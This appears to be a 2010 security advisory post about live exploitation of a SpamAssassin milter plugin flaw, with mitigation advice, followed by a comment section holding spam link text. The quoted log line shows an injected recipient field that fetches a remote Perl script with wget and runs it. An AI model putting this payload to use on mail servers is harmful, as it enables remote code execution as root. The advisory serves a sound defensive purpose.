Spamassassin Milter Plugin Remote Root Attack
Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:
Messages rejected to recipient: root+:|wget
hxxp://www.linux-echo.de/.x/p.txt;perl p.txt: smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<blue@attacker.com> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)
Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).
The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.
Update: SecurityFocus BID 38578
Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136
Alternatively, don't use the -x option when running this plugin, as well do not run it as root.
Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
Comments
www
Nov 17th 2022
6 months ago
EEW
Nov 17th 2022
6 months ago
qwq
Nov 17th 2022
6 months ago
mashood
Nov 17th 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Nov 23rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
isc.sans.edu
Dec 3rd 2022
6 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
isc.sans.edu
Dec 26th 2022
5 months ago
isc.sans.edu
Dec 26th 2022
5 months ago